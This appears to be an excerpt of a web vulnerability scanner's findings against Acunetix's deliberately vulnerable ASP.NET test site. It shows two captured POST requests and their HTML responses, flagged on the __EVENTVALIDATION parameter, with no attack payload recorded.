Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1137 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,137 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8447&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgCAOr%2BwD9sIZGRksYgHrk7jggELjCqRyUAy48OMPiE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLslqTQCQLQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBT2ChrYKh%2FTe6P1eBXLx5xzmggI4
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:33:40 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgCAOr+wD9sIZGRksYgHrk7jggELjCqRyUAy48OMPiE=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLslqTQCQLQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBT2ChrYKh/Te6P1eBXLx5xzmggI4" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:White" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1135 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,135 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8486&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgDAVjVWLtsIZGRklO%2Bd1%2FYnf9xHHG8IbPu7p%2FQCPt8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLSnumiDALTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwcqiEE6zB9G%2FhtYuo9q1GbLyaV11g%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:52:18 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgDAVjVWLtsIZGRklO+d1/Ynf9xHHG8IbPu7p/QCPt8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLSnumiDALTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwcqiEE6zB9G/htYuo9q1GbLyaV11g==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:White" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
